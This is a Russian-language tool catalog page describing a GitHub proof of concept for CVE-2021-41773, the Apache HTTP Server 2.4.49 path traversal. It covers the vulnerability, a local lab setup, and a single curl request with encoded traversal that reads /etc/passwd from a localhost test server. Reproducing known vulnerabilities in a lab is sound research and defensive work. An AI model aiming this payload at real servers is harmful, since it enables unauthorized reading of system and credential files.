Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2021-41773-POC — Воспроизведение уязвимости Path Traversal в Apache HTTP Server 2.4.49 | Kitploit
Инструменты/GitHubGitHub/fxdyx-a/cve-2021-41773-poc
РазведкаАнализ уязвимостейЭксплуатацияВеб-безопасностьТестирование на Проникновение
GitHubfxdyx-a/cve-2021-41773-poc

CVE-2021-41773-POC

Воспроизведение уязвимости Path Traversal в Apache HTTP Server 2.4.49

Репозиторий
2 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2021-41773: отчёт о воспроизведении уязвимости

Обзор уязвимости

  • CVE ID: CVE-2021-41773
  • Название уязвимости: Apache HTTP Server — уязвимость обхода пути
  • Уровень риска: высокий (CVSS 7.5)
  • Затронутые версии: Apache HTTP Server 2.4.49
  • Описание уязвимости: В Apache HTTP Server версии 2.4.49 присутствует дефект реализации функции нормализации пути ap_normalize_path. Атакующий может обойти контроль доступа, отправив специально сформированный запрос, содержащий закодированный %2e, и прочитать произвольные файлы на веб-сервере.

Развёртывание окружения

  • Операционная система: Ubuntu 20.04 (виртуальная машина)
  • Веб-сервер: Apache httpd 2.4.49 (ручная сборка из исходников)
  • Лабораторный стенд: автономный запуск, прослушивание порта 8080
  • Ключевая конфигурация:
    • Заменить Require all denied на Require all granted для <Directory />
    • Добавить Alias /vuln, указывающий на /tmp/vuln_dir, и установить права доступа

Воспроизведение уязвимости

Команда атаки

curl -v --path-as-is 'http://127.0.0.1:8080/vuln/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd'

Скриншоты атаки

Успешное чтение /etc/passwd Успешное чтение /etc/passwd

Скачать инструмент